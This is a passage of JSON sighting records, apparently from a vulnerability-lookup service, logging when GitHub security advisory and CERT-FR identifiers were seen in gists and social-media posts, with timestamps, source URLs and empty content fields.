"author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/456b4688d7a86dacff6230a80c7ddbb4", "content": "", "creation_timestamp": "2026-06-24T08:52:31.000000Z"}, {"uuid": "0b3aac4c-16ef-4562-beba-5491bbf3ebcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/6c21760efa2a2a5ae68dc4850e064127", "content": "", "creation_timestamp": "2026-06-24T13:26:12.000000Z"}, {"uuid": "ec28ab0e-3443-4dff-a626-7008850e6e07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/a0a17a73950051070e1466881ac96bd7", "content": "", "creation_timestamp": "2026-06-24T14:02:46.000000Z"}, {"uuid": "1c33cd28-401f-4957-8642-f0b27f1c068c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f637-w7p2-m7fx", "type": "seen", "source": "https://gist.github.com/alon710/f2b2f51072808beda8e52a43b0bdd064", "content": "", "creation_timestamp": "2026-06-24T18:43:21.911584Z"}, {"uuid": "efb85a04-5986-4288-af5e-a4b0588f9cdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f637-w7p2-m7fx", "type": "seen", "source": "https://gist.github.com/alon710/1366cab1be37fd922161593dd6bd5218", "content": "", "creation_timestamp": "2026-06-24T19:04:03.129966Z"}, {"uuid": "d271d453-1af9-42b5-beef-2135780b8b73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7fq5-7wr8-rjwj", "type": "seen", "source": "https://gist.github.com/alon710/cb59405487e5944ed006860e5bc630ab", "content": "", "creation_timestamp": "2026-06-24T19:54:03.158790Z"}, {"uuid": "afb09a2c-4578-4f6e-9292-be829475663b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7fq5-7wr8-rjwj", "type": "seen", "source": "https://gist.github.com/alon710/3e7dd842c80dfd534275b1d215c3d4b9", "content": "", "creation_timestamp": "2026-06-24T20:02:14.787314Z"}, {"uuid": "84d59275-46b9-4735-856b-dd1916efc7fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-434x-w66g-qw3r", "type": "seen", "source": "https://gist.github.com/moonpiedumplings/7e71121b76c58ecaba4176be9bb827c4", "content": "", "creation_timestamp": "2026-06-24T21:41:59.735450Z"}, {"uuid": "f4f58e1e-787a-40d3-aaee-f49eacb788aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-px7q-ggqj-hcf2", "type": "seen", "source": "https://gist.github.com/alon710/8649cee74b41dfbab6352036ad771ea3", "content": "", "creation_timestamp": "2026-06-26T16:42:20.201635Z"}, {"uuid": "c64fe5c4-3ee4-43aa-a397-43f0545b52ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-px7q-ggqj-hcf2", "type": "seen", "source": "https://gist.github.com/alon710/ab6fb045bc60bbc32d947423444fcf91", "content": "", "creation_timestamp": "2026-06-26T16:52:45.643503Z"}, {"uuid": "e4517072-e1fa-4be5-b34c-34f3288b3e9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4c8j-mgm4-qqvp", "type": "seen", "source": "https://gist.github.com/alon710/89044faa74c1d9de479703a9098fa939", "content": "", "creation_timestamp": "2026-06-26T19:42:06.242732Z"}, {"uuid": "97989cb0-1365-4336-92d3-1930789f4ac1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xvp4-phqj-cjr3", "type": "seen", "source": "https://gist.github.com/alon710/e9c21cf2a4b3d2c5f2db0a4799f8c878", "content": "", "creation_timestamp": "2026-06-26T21:42:10.203497Z"}, {"uuid": "f8f44235-d0c6-404c-93c8-e02bf713ecfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-985R-Q3QP-299H", "type": "seen", "source": "https://gist.github.com/alon710/e9c21cf2a4b3d2c5f2db0a4799f8c878", "content": "", "creation_timestamp": "2026-06-26T21:42:10.153034Z"}, {"uuid": "84719c92-4a83-4d70-b87a-ddadefe35d2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgvg-3wpc-h44p", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mp7xfcnzpe2s", "content": "", "creation_timestamp": "2026-06-26T22:07:44.862089Z"}, {"uuid": "764870dd-c8ed-42ee-8652-e8c6e7e2dc01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vc5-wxxq-3fjx", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mp7znrg3ri2v", "content": "", "creation_timestamp": "2026-06-26T22:48:16.132409Z"}, {"uuid": "cf3115e6-fc88-4a8b-9e41-1a6a5982473f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m727-pcjm-j28h", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mp7zjccddf2o", "content": "", "creation_timestamp": "2026-06-26T22:45:45.975692Z"}, {"uuid": "ffe9866e-7c7c-4527-9d86-f2cd37de820a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4gxv-p5g5-j7w7", "type": "seen", "source": "https://gist.github.com/alon710/aef49efca881722a2606f374108f34f4", "content": "", "creation_timestamp": "2026-06-26T23:42:14.727145Z"}, {"uuid": "564b6ea7-6baf-4f84-8cde-401b824b55de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4gxv-p5g5-j7w7", "type": "seen", "source": "https://gist.github.com/alon710/aef49efca881722a2606f374108f34f4", "content": "", "creation_timestamp": "2026-06-27T00:00:58.377457Z"}, {"uuid": "dde19016-f83b-4d30-9633-4f6a83a54453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QRV3-253H-G69C", "type": "seen", "source": "https://gist.github.com/alon710/ce97a7a2201a10b1242cd90e0ea16a7d", "content": "", "creation_timestamp": "2026-06-27T00:42:18.378119Z"}, {"uuid": "3563d50d-7e8b-4ac5-97ed-fc057df33108", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72R4-9C5J-MJ57", "type": "seen", "source": "https://gist.github.com/alon710/8e13d6d37310b61ef33c4ee0f35eeb61", "content": "", "creation_timestamp": "2026-06-27T01:42:35.368520Z"}, {"uuid": "8bda4ec4-09f1-4de4-986b-7e5e89aae5e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fqgm-2x23-c4xm", "type": "seen", "source": "https://gist.github.com/CyberKareem/a5884cfd6ce864e0c126d4ad2a0c689c", "content": "", "creation_timestamp": "2026-06-29T16:59:42.401782Z"}, {"uuid": "eab1c71e-ad8d-4221-9846-fbc408e409a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xc63-6253-wpxj", "type": "seen", "source": "https://gist.github.com/CyberKareem/b0be586b08e26973675ce3d8f1a4a8da", "content": "", "creation_timestamp": "2026-06-29T16:59:42.373617Z"}, {"uuid": "d4183888-a605-4d6b-8b3b-8be60d3de871", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pfq8-h8c4-mprw", "type": "seen", "source": "https://gist.github.com/CyberKareem/601501c133cced1fae4f94d24c0da5cd", "content": "", "creation_timestamp": "2026-06-29T16:59:42.347591Z"}, {"uuid": "0769fb1b-7dde-4ff1-8344-5a11b240d163", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-37r3-q4cw-f7gq", "type": "seen", "source": "https://gist.github.com/CyberKareem/37b525da8fcc1cc9bd9ee5e50b75f2b2", "content": "", "creation_timestamp": "2026-06-29T16:59:42.316032Z"}, {"uuid": "6e3b572b-3421-4f30-aa25-7d993282d516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vwxw-jrg6-9jxv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/116835056501762471", "content": "", "creation_timestamp": "2026-06-29T19:31:37.829670Z"}, {"uuid": "f6fc846e-eca7-406c-8665-ab184f6b22d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9pp4-wcmj-rq73", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mphhdvpkml2e", "content": "", "creation_timestamp": "2026-06-29T21:41:55.821777Z"}, {"uuid": "3b8e848d-fcec-4e92-8432-d32c3e27508d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c7c5-5j6r-q957", "type": "seen", "source": "https://gist.github.com/alon710/54d5caa66e0c608481afad4bb0bb44a6", "content": "", "creation_timestamp": "2026-09-17T09:32:22.599284Z"}, {"uuid": "fe23c2a3-e924-4ee2-bf17-ab93569c5f2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v9rj-xjfv-xj9r", "type": "seen", "source": "https://gist.github.com/alon710/af16074dda7459d4288c488d29fd9ab0", "content": "", "creation_timestamp": "2026-09-17T08:31:33.409585Z"}, {"uuid": "6e8f5ba7-be81-4f56-a95a-aa38327590c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7prp-2623-8g45", "type": "seen", "source": "https://gist.github.com/alon710/1597536733cc04eb6b518d3f17d63c1c", "content": "", "creation_timestamp": "2026-09-17T07:32:47.016835Z"}, {"uuid": "02b24a20-945b-4bee-b273-4051e5e92520", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2vcx-h8p2-9pg9", "type": "seen", "source": "https://gist.github.com/alon710/b4c3012210552826178a239bffbc7d9c", "content": "", "creation_timestamp": "2026-09-17T06:32:02.234226Z"}, {"uuid": "aba77a26-301d-4583-954b-bb756c496ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hcwq-8wjf-3gcr", "type": "seen", "source": "https://gist.github.com/alon710/725c0a2c00f7edc1e74698f411f27baa", "content": "", "creation_timestamp": "2026-09-17T05:32:04.741441Z"}, {"uuid": "529bbc6d-2b04-48e5-83a1-b756a209982f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cv3r-c5h8-f4g5", "type": "seen", "source": "https://gist.github.com/alon710/53a2d29306b87115c0a5f70b93a57923", "content": "", "creation_timestamp": "2026-09-16T21:32:23.274528Z"}, {"uuid": "18b46586-60bb-4fbc-b8e4-5a6cab1e4cc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8g2f-g3gq-5rjv", "type": "seen", "source": "https://gist.github.com/alon710/ef6456b2c611c3d15ec3538b07012ea5", "content": "", "creation_timestamp": "2026-09-16T20:32:38.586187Z"}, {"uuid": "2507f726-9479-4dfc-b75e-9e996b5b77f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3492-cvg7-9mr2", "type": "seen", "source": "https://gist.github.com/alon710/add36254cc8a2aecb663b59914ea2d7d", "content": "", "creation_timestamp": "2026-09-16T19:33:34.378973Z"}, {"uuid": "fb363121-d1ed-40d6-a8b6-0f0984908397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5h8j-6crg-7rmw", "type": "seen", "source": "https://gist.github.com/alon710/efe1b2090e21bb0a7cf5f18ce00c2614", "content": "", "creation_timestamp": "2026-09-16T18:31:42.466819Z"}, {"uuid": "3cf725d1-8bed-4d08-bfa0-bc5a1f2873d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5h8j-6crg-7rmw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117281985112667837", "content": "", "creation_timestamp": "2026-09-16T17:51:12.653267Z"}, {"uuid": "a2d474d3-5d41-4c3c-8605-acdcf0fa9adb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r2pf-9cw4-5j65", "type": "seen", "source": "https://gist.github.com/alon710/ca48de2f64cb21c4b6fdba639af7e2ac", "content": "", "creation_timestamp": "2026-09-16T17:31:30.429832Z"}, {"uuid": "8ce35c48-a86f-40a5-bd7c-38c12f83ac4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-84hp-mqvj-3p8h", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3mppkkiqr622k", "content": "", "creation_timestamp": "2026-07-03T03:00:37.359490Z"}, {"uuid": "c9371743-8a34-41e9-9f5c-c93c669abd22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-84hp-mqvj-3p8h", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/116853809243699371", "content": "", "creation_timestamp": "2026-07-03T03:00:27.142830Z"}, {"uuid": "d4f1a811-5411-498b-b7b9-57fad47e5dca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-4pq2-jh73-g3hw", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3mpubgil3hs2b", "content": "", "creation_timestamp": "2026-07-05T00:00:36.784034Z"}, {"uuid": "ae71cb5f-926e-459a-99f8-e2427571a735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-4pq2-jh73-g3hw", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/116864426613570439", "content": "", "creation_timestamp": "2026-07-05T00:00:35.341278Z"}, {"uuid": "456a864e-7905-4dfe-aeec-ae67a6260f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7r4-m6w7-qqqr", "type": "seen", "source": "https://gist.github.com/konard/88609dd395d6031e4d410d3826dc1450", "content": "", "creation_timestamp": "2026-07-05T13:35:44.754566Z"}, {"uuid": "dfe96294-1bba-4b84-a014-2084adfc11d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jrpj-wcv7-9fh9", "type": "seen", "source": "https://gist.github.com/konard/88609dd395d6031e4d410d3826dc1450", "content": "", "creation_timestamp": "2026-07-05T13:35:43.254132Z"}, {"uuid": "9911c4e5-2bbd-403b-8120-5f8ab4390e69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xr5h-phrj-8vxv", "type": "seen", "source": "https://gist.github.com/konard/88609dd395d6031e4d410d3826dc1450", "content": "", "creation_timestamp": "2026-07-05T13:35:41.776704Z"}, {"uuid": "e5470af0-8524-4fbb-a684-19f5611a28de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8hv8-536x-4wqp", "type": "seen", "source": "https://gist.github.com/konard/88609dd395d6031e4d410d3826dc1450", "content": "", "creation_timestamp": "2026-07-05T13:35:40.300978Z"}, {"uuid": "57e6ba1c-e32f-4c21-a388-62c2b4c5705b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q4gf-8mx6-v5v3", "type": "seen", "source": "https://gist.github.com/konard/9d39b6c3a9680a830d237c6c570f8933", "content": "", "creation_timestamp": "2026-06-05T13:43:59.000000Z"}, {"uuid": "afd4465c-51c8-4a0f-bbfa-084615e9777d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fv26-4939-62fh", "type": "seen", "source": "https://gist.github.com/ImTopz/f2594fa5cfbb88d233b74eb182cef5cc", "content": "", "creation_timestamp": "2026-06-05T14:32:56.000000Z"}, {"uuid": "2f69d062-ed3c-4110-8ff4-ec1574836104", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pvfv-wvpm-q6f6", "type": "seen", "source": "https://gist.github.com/ImTopz/33a987bda3c2850a7e9f373a49b245a7", "content": "", "creation_timestamp": "2026-06-05T14:49:28.000000Z"}, {"uuid": "2b78f872-8f2b-4970-a9f5-5c7ab8c3bee6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-79rj-f7gj-xf33", "type": "seen", "source": "https://gist.github.com/that1guycolin/b28d5802399c42591791c416e71c66dc", "content": "", "creation_timestamp": "2026-06-06T22:10:54.000000Z"}, {"uuid": "293b002a-0460-4167-9f21-159246cf95d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q42p-pg8m-cqh6", "type": "seen", "source": "https://gist.github.com/TechnoHacks181/f65a689f72c3b2c1a6388201b5cc6ab3", "content": "", "creation_timestamp": "2026-06-07T06:15:06.000000Z"}, {"uuid": "6ea497bb-280b-41be-b28f-164bff3b7e04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2679-6mx9-h9xc", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mnqz4prndu2x", "content": "", "creation_timestamp": "2026-06-08T06:03:36.391740Z"}, {"uuid": "fa6d529b-564b-4a4c-8099-2b5afee3e4d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VC8P-8PXG-RFWG", "type": "seen", "source": "https://gist.github.com/alon710/324e2f3b899f3fc7cc3244012ed256f9", "content": "", "creation_timestamp": "2026-06-15T10:41:12.000000Z"}, {"uuid": "5152d872-bca8-46c7-b224-b6b8acb8e292", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CH3Q-CW5R-F4HG", "type": "seen", "source": "https://gist.github.com/alon710/3171d078d5c19056080e6296ed9edb03", "content": "", "creation_timestamp": "2026-06-15T11:11:47.000000Z"}, {"uuid": "a545e4a7-cf78-423d-ac70-3d2bdf1315a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CHGR-C6PX-7XPP", "type": "seen", "source": "https://gist.github.com/alon710/7781242dd6423ae75e05b31377b89606", "content": "", "creation_timestamp": "2026-06-15T11:41:32.000000Z"}, {"uuid": "1172f438-19dc-42a2-8833-04949a62a43a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-026", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3modb5x22v62s", "content": "", "creation_timestamp": "2026-06-15T12:15:22.595109Z"}, {"uuid": "5cd3e264-2954-46ab-89f7-3988eb41315b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/alon710/941b83f5e57b578e36f6f2a8a8b0f71f", "content": "", "creation_timestamp": "2026-06-15T12:11:47.000000Z"}, {"uuid": "a3fd36a5-0d9b-44ab-bc86-95caad5b202f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-026", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116754009882252784", "content": "", "creation_timestamp": "2026-06-15T12:00:21.162809Z"}, {"uuid": "d4a3c768-c5f5-4ed2-8cd4-502e51b1dda8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-026", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3modacqtf5b2h", "content": "", "creation_timestamp": "2026-06-15T12:00:10.177496Z"}, {"uuid": "7b2aacaf-94f5-4d5a-8483-977e473dd057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G7R4-M6W7-QQQR", "type": "seen", "source": "https://gist.github.com/alon710/174a230087452badddd6537b27864239", "content": "", "creation_timestamp": "2026-06-15T13:41:17.000000Z"}, {"uuid": "39f29a1e-db84-459e-aed8-48163da57fa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7c78-jf6q-g5cm", "type": "seen", "source": "https://gist.github.com/alon710/0bdb094f8b35593b7efeef728ecec669", "content": "", "creation_timestamp": "2026-06-15T17:11:14.000000Z"}, {"uuid": "662973ac-bed3-4700-8fd3-dc9003c03df8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fhv5-28vv-h8m8", "type": "seen", "source": "https://gist.github.com/alon710/1f95260cf4713d452e9aa65f49fefae4", "content": "", "creation_timestamp": "2026-06-15T17:41:21.000000Z"}, {"uuid": "402ab086-7858-4fdf-80ae-663066142933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-268h-hp4c-crq3", "type": "seen", "source": "https://gist.github.com/alon710/c427aa6118bf0e273bdc93bc35772150", "content": "", "creation_timestamp": "2026-06-15T18:11:22.000000Z"}, {"uuid": "c33b408d-e4ff-49db-af28-d3568e9468b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-268h-hp4c-crq3", "type": "seen", "source": "https://gist.github.com/alon710/01c407f3bffadb22b40d757dceeb3168", "content": "", "creation_timestamp": "2026-06-15T18:31:11.000000Z"}, {"uuid": "388d4c77-480a-4895-9a07-04a3bacd157c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-268h-hp4c-crq3", "type": "seen", "source": "https://gist.github.com/alon710/af634e90c0bab5733aa7b5794a1ffb98", "content": "", "creation_timestamp": "2026-06-15T18:21:39.000000Z"}, {"uuid": "4c894bfa-ad41-4e05-8f05-0bb300339cf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-268h-hp4c-crq3", "type": "seen", "source": "https://gist.github.com/alon710/a475bf1922f91b9966125749f74e3c3d", "content": "", "creation_timestamp": "2026-06-15T18:41:42.000000Z"}, {"uuid": "b7bad5ef-4ae9-4f95-bc59-96c61785effc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WQVQ-JVPQ-H66F", "type": "seen", "source": "https://gist.github.com/alon710/edcc0e217b63261cd7466683bc63318c", "content": "", "creation_timestamp": "2026-06-15T18:41:42.000000Z"}, {"uuid": "22fd338d-aa8c-4acb-89f9-4341338d99bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7vc-732c-9m39", "type": "seen", "source": "https://gist.github.com/alon710/9d5d358571e9a39984e3ba8848038e82", "content": "", "creation_timestamp": "2026-06-15T19:51:29.000000Z"}, {"uuid": "0f3cbee2-3d9c-41ac-b0ea-8a46fdab0231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7vc-732c-9m39", "type": "seen", "source": "https://gist.github.com/alon710/65e78fc78054322fc9a9e7b7f341ade1", "content": "", "creation_timestamp": "2026-06-15T19:41:20.000000Z"}, {"uuid": "0a4aa0b5-8d8e-4949-a82e-1cde3c2d6b0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7vc-732c-9m39", "type": "seen", "source": "https://gist.github.com/alon710/5176e235b1faf51aeac2691145abc27f", "content": "", "creation_timestamp": "2026-06-15T20:01:21.000000Z"}, {"uuid": "4ff21c4a-7d04-4f39-93dc-a8717dc2472a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RQ7W-G337-39QQ", "type": "seen", "source": "https://gist.github.com/alon710/be69f9c7f59f396504036ec9a026919b", "content": "", "creation_timestamp": "2026-06-15T21:11:17.000000Z"}, {"uuid": 